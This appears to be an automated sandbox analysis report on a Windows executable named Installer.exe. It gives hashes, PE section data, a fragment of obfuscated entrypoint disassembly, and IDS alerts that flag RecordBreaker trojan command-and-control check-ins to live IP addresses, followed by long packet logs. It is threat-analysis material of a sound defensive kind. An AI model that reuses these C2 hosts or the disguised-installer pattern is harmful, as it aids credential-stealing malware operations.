Entropy (8bit):	2.2359263506290326
Encrypted:	false
SSDEEP:	3:t:t
MD5:	F1CA165C0DA831C9A17D08C4DECBD114
SHA1:	D750F8260312A40968458169B496C40DACC751CA
SHA-256:	ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
SHA-512:	052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
Malicious:	false
Reputation:	unknown
Preview:	Ok.....

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.852740515085623
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Installer.exe
File size:	10032128
MD5:	2522d780342912e8445b24a2591ecc8f
SHA1:	3f9d68666e83e4ac614ef5377c2bf9ac25d3c1da
SHA256:	cba2a99e147d807ab2d61744de51dbc8b8205d09f1ca9b2dd472d1953b274c11
SHA512:	23c8d09a50b1e7e84ced505a5d097e8348202f728fa441f978dc64f98a9b75d12a44003ea59182a38d6c3e98ac9ce48f4271e5c55ed7959a93235dddff2de4a9
SSDEEP:	196608:5t6xPEBsK84B5YUOlQ2XxWi4AVKHHGpPF9MWLud6kJwvSf3A4eCbzB91D:5twyeUODxWin9/ud6kJ53AnS7
TLSH:	D5A6023153D946F0D3F9AD744B67F9D174A0983CE082ED30638E2C963E299EC297D4A6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c.................v....).......h...........@..........................p........................................c.O..

File Icon


Icon Hash:	f4d4ccd4d4d4d4d4

Static PE Info

General

Entrypoint:	0xa897b0
Entrypoint Section:	.dfghf2
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x639A19E7 [Wed Dec 14 18:45:59 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	11ea24073ee65343ee563e3160c77fde

Entrypoint Preview

Instruction
call 00007F0FF4815702h
inc edx
xor edx, 24C560CDh
test edx, 4508704Ah
add edx, 6C967583h
cmc
xor edx, 7C8D6C1Ch
clc
rol edx, 03h
xor ebx, edx
cmp bp, 7AE2h
add esi, edx
jmp 00007F0FF4774FCFh
push esi
ret
movzx bx, dx
and dword ptr [esp+24h], 0E5772F5h
not word ptr [esp+18h]
and byte ptr [esp+28h], FFFFFFDAh
mov edx, dword ptr [esp+1Ch]
test dword ptr [esp+24h], ebx
jng 00007F0FF4733F3Ch
and word ptr [esp+24h], bx
test dword ptr [esp+18h], 439164E6h
setb byte ptr [esp+24h]
bswap ebx
and word ptr [esp+28h], 3D7Dh
test bl, 0000001Bh
lea esp, dword ptr [esp+08h]
retn 000Ch
movzx eax, byte ptr [edi]
movsx edx, di
bswap dx
lea edi, dword ptr [edi+00000001h]
rcr dx, cl
shrd edx, ebx, 00000012h
shr dx, cl
xor al, bl
mov dx, di
inc edx
dec al
neg al
ror edx, FFFFFFF7h
bts edx, ebx
not al
bt edx, ebp
btc edx, ebx
rol edx, 75h
rol al, 1
add al, 81h
bt edx, eax
not al
setnb dh
cdq
xor bl, al
lea ebp, dword ptr [ebp-00000002h]
xor dh, FFFFFFD6h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x631bb0	0xc4f	.dfghf0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x76cb18	0xa0	.dfghf2
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x929000	0x6dfc5	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x633000	0x50	.dfghf1
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x17479	0x17600	False	0.5053267045454546	data	6.081353615252277	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x19000	0x29a4	0x2a00	False	0.7244233630952381	data	5.856664296883191	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1c000	0x5b8	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x1d000	0x4	0x200	False	0.03125	MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "@"	0.04078075625387198	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.dfghf0	0x1e000	0x6147ff	0x614800	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.dfghf1	0x633000	0x380	0x400	False	0.0703125	data	0.43083963317521234	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dfghf2	0x634000	0x2f41f0	0x2f4200	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x929000	0x6dfc5	0x6e000	False	0.21538751775568182	data	5.114574142533127	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x9292c8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088
RT_ICON	0x929730	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400
RT_ICON	0x92a0b8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224
RT_ICON	0x92b160	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600
RT_ICON	0x92d708	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896
RT_ICON	0x931930	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016
RT_ICON	0x93add8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584
RT_ICON	0x94b600	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 270336
RT_ICON	0x98d628	0x93ef	PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
RT_GROUP_ICON	0x996a18	0x84	data
RT_VERSION	0x996a9c	0x3ac	data	English	Canada
RT_MANIFEST	0x996e48	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	lstrlenA
USER32.dll	DestroyWindow
GDI32.dll	GetObjectW
ole32.dll	CoDecodeProxy
KERNEL32.dll	GetSystemTimeAsFileTime
USER32.dll	CharUpperBuffW
KERNEL32.dll	LocalAlloc, LocalFree, GetModuleFileNameW, ExitProcess, LoadLibraryA, GetModuleHandleA, GetProcAddress

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Canada
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.4172.66.40.196496974432039616 01/04/23-16:48:18.137155	TCP	2039616	ET TROJAN Win32/Agent.AETZ CnC Checkin	49697	443	192.168.2.4	172.66.40.196
109.107.173.210192.168.2.480496952036955 01/04/23-16:47:23.522722	TCP	2036955	ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response	80	49695	109.107.173.210	192.168.2.4
192.168.2.4109.107.173.21049695802036934 01/04/23-16:47:23.441995	TCP	2036934	ET TROJAN Win32/RecordBreaker CnC Checkin M1	49695	80	192.168.2.4	109.107.173.210
192.168.2.466.235.200.14749696802043003 01/04/23-16:47:37.397562	TCP	2043003	ET TROJAN Win32/RecordBreaker - Observed UA M5 (23591)	49696	80	192.168.2.4	66.235.200.147
192.168.2.4109.107.173.21049695802043003 01/04/23-16:47:27.555819	TCP	2043003	ET TROJAN Win32/RecordBreaker - Observed UA M5 (23591)	49695	80	192.168.2.4	109.107.173.210

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 4, 2023 16:47:23.415007114 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.441226959 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.441411972 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.441994905 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.468719006 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.522722006 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.522794962 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.522825956 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.522842884 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.522869110 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.522897959 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.522945881 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.522960901 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.522960901 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.522993088 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.522993088 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.523039103 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.523041010 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.523082018 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.669138908 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.695744038 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.704811096 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.704869986 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.704919100 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.704957008 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.705003023 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.705022097 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.705053091 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.705059052 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.705105066 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.705113888 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.705133915 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.705157042 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.705179930 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.705194950 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.705225945 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.705230951 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.705277920 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.705306053 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.705359936 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.706955910 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.707006931 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.707053900 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.707063913 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.707099915 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.707128048 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.731292009 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.731353998 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.731401920 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.731492043 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.731501102 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.731533051 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.731595039 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.731656075 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.731703997 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.731710911 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.731755018 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.731755972 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.731802940 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.731844902 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.731849909 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.731863976 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.731898069 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.731903076 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.731949091 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.731949091 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.732007027 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.732022047 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.732069969 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.732076883 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.732115984 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.732120991 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.732165098 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.732168913 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.732213020 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.732217073 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.732259035 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.732268095 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.732307911 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.732312918 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.732356071 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.732357979 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.732402086 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.732410908 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.732450008 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.732455015 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.732497931 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.732501030 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.732551098 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.732764006 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.732811928 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.732824087 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.732860088 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.732861996 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.732909918 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.732911110 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.732956886 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.732964993 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.733006001 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.733009100 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.733067989 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.757458925 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.757531881 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.757580996 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.757630110 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.757669926 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.757678032 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.757725954 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.757730007 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.757781982 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.757920027 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.758326054 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.758375883 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.758399010 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.758425951 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.758462906 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.758475065 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.758487940 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.758523941 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.758527040 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.758573055 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.758575916 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.758621931 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.758624077 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.758670092 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.758677006 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.758723021 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.758747101 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.758794069 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.758817911 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.758841038 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.758845091 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.758889914 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.758898973 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.758939981 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.758940935 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.758986950 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.758991003 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.759036064 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.759042025 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.759084940 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.759088039 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.759133101 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.759135008 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.759181976 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.759185076 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.759228945 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.759233952 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.759278059 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.759293079 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.759325981 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.759336948 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.759377956 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.759382963 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.759428978 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.759429932 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.759476900 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.759483099 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.759524107 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.759525061 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.759572983 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.759573936 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.759619951 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.759624958 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.759669065 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.759673119 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.759716988 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.759718895 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.759771109 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.759798050 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.759845972 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.759849072 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.759893894 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.759898901 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.759943962 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.759948969 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.759991884 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.759993076 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.760039091 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.760046005 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.760092974 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.760140896 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.760190010 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.760194063 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.760237932 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.760240078 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.760286093 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.760293007 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.760339022 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.760363102 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.760411024 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.760423899 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.760459900 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.760461092 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.760505915 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.760509014 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.760566950 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.760580063 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.760629892 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.760631084 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.760677099 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.760678053 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.760725021 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.760730982 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.760777950 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.760798931 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.760849953 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.761038065 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.761089087 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.761102915 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.761158943 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.784051895 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.784116983 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.784167051 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.784214020 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.784260035 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.784322023 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.784368038 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.784394026 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.784420013 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.784446001 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.784486055 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.784493923 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.784547091 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.784599066 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.787981033 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.788038015 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.788085938 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.788134098 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.788180113 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.788180113 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.788229942 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.788276911 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.788283110 CET	49695	80	192.168.2.4	109.107.173.210
